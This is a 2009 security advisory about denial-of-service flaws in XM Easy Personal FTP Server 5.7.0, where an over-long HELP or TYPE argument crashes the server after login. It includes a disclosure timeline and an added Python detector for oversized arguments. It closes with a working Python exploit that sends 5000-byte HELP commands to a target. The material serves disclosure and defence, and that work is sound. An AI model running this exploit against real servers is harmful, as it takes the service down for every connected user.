[Security] XM Easy Personal FTP Server Multiple DoS vulnerabilities
SECURITYVULNS:DOC:21958
Published: 2009-06-05 00:00:00 (vulners.com)

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. Multiple denial-of-service
vulnerabilities exist in XM Easy Personal FTP Server: the application crashes when an overly long
argument is sent to certain FTP commands after authentication.

Details:
The DoS vulnerabilities exist because the application fails to handle large parameter values sent
to certain FTP commands such as HELP or TYPE. When a long value (> 4700 bytes) is passed as the
parameter to one of these commands, the FTP server cannot process it and crashes, taking the
service down for every connected user. Note that these are post-authentication vulnerabilities: the
attacker must hold valid credentials and be logged in to trigger them. No registers are
overwritten, so remote code execution does not appear to be possible.

Severity:
High

Solution:
No patch is available from the vendor.
No workaround is available at this time.
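With neither patch nor workaround on offer, the compensating control left to a defender is to notice the attack on the wire. The following detector is an added example written for this page, not something the advisory provides: it walks a control-channel transcript, tracks whether the session authenticated (a 230 reply to PASS), and raises an alert for any command whose argument is longer than a local limit. The transcript format ("C: " client lines, "S: " server lines) and the 512-byte alert limit are this example's assumptions; the 4700-byte figure and the post-authentication condition are the advisory's. The sample session is constructed, not a real capture.

```python
"""Passive detection of oversized FTP command arguments (added example)."""

ADVISORY_THRESHOLD = 4700   # crash point the advisory reports (> 4700 bytes)
ALERT_THRESHOLD = 512       # assumption: legitimate arguments are far shorter; tune locally


def detect_long_args(transcript, alert_threshold=ALERT_THRESHOLD):
    """Return one alert dict per client command whose argument exceeds
    alert_threshold.  'post_auth' records whether the session had a 230 reply
    to PASS before the command; 'no_reply' records that no server line follows
    it (what a crashed daemon looks like, or a transcript cut off early);
    'severity' is high only when both the advisory's conditions are met."""
    lines = transcript.splitlines()
    alerts = []
    authed = False
    awaiting_pass_reply = False
    for i, line in enumerate(lines):
        if line.startswith("S: "):
            if awaiting_pass_reply:
                authed = line[3:6] == "230"
                awaiting_pass_reply = False
            continue
        if not line.startswith("C: "):
            continue                          # ignore non-C:/S: lines
        verb, _, arg = line[3:].partition(" ")
        verb = verb.upper()
        if verb == "PASS":
            awaiting_pass_reply = True
        if len(arg) <= alert_threshold:
            continue
        replied = i + 1 < len(lines) and lines[i + 1].startswith("S: ")
        alerts.append({
            "line": i + 1,
            "command": verb,
            "arg_len": len(arg),
            "post_auth": authed,
            "no_reply": not replied,
            "severity": "high" if authed and len(arg) > ADVISORY_THRESHOLD else "medium",
        })
    return alerts


def build_sample_transcript(arg_len, authenticated=True, command="HELP"):
    """Constructed sample session (not a real capture).  Mirrors the advisory:
    the server answers the command only if the argument is within 4700 bytes."""
    lines = [
        "S: 220 XM Easy Personal FTP Server ready",
        "C: USER bob",
        "S: 331 Password required",
        "C: PASS hunter2",
        "S: 230 Logged in" if authenticated else "S: 530 Login incorrect",
        "C: NOOP",
        "S: 200 OK",
        "C: %s %s" % (command, "A" * arg_len),
    ]
    if arg_len <= ADVISORY_THRESHOLD:
        lines.append("S: 214 Help OK")
    return "\n".join(lines)


if __name__ == "__main__":
    for alert in detect_long_args(build_sample_transcript(5000)):
        print(alert)
```

Feed it the control channel from a proxy log or a reassembled pcap stream; the 'no_reply' flag is the piece worth correlating with a service-down alert from monitoring, since a long argument the server answered is suspicious but not the outage.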

Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure

PoC: Python Exploit

#!/usr/bin/env python3
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:...[ XM Easy Personal FTP Server 5.7.0 ]...
# [-] Where:...[ http://www.dxm2008.com ]...
# [-] When:...[ 14-May-2009 ]...
# [-] Who:...[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]...
# [-] How:...[ A Denial of service vulnerability exists in XM
#              Personal FTP Server that causes the application to
#              crash when a long list of arguments is sent to
#              certain FTP commands post authentication...]
# [-] Thankz:...[ Jambalaya, Xin and Chintan ]...

import sys
from ftplib import FTP, all_errors


def usage():
    print("[...XM Personal FTP Server 5.7.0 DoS Exploit...]")
    print("[...neeraj(.)thakar(at)gmail(.)com...]\n")
    print("Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n")
    print("\n Use it at your own risk ! This is just a PoC. I am not responsible for damages "
          "done by your crazy thinking... :P\n")


# The main function starts here...
if __name__ == "__main__":
    ftpport = 21

    # get the args.. (script name plus three arguments)
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]

    print("Connecting to " + ftpserver + " using " + user + "....", end=" ")

    # Try opening a connection to the FTP server
    try:
        F = FTP()
        F.connect(ftpserver, ftpport, timeout=3)
        print("Connected !")
    except all_errors:
        print("\nCould not connect to the Server :(\n")
        sys.exit(1)

    # Lets create the Buffer.. (5000 bytes, above the ~4700-byte crash threshold)
    crap = "A" * 5000

    # Creat'in da'bomb
    dabomb = "HELP " + crap

    print("Press any key to login..")
    ch = sys.stdin.read(1)

    # Lets login (post-authentication bug: a valid account is required)
    try:
        F.login(user, passwd)
    except all_errors:
        print("Oops.. Looks like you forgot to create a login !!\n")
        F.quit()
        sys.exit(1)
    print("Target Locked, Press any key to fire..", end=" ")
    ch = sys.stdin.read(1)

    print("Sendin Da'Bomb..")
    try:
        F.sendcmd(dabomb)
    except all_errors:
        # The server drops the connection when it crashes, so a failed
        # command/response exchange is the success indicator here.
        print("Target destroyed !! Mission successfull..!")

    print("Returning to base..")
    F.close()
    sys.exit(0)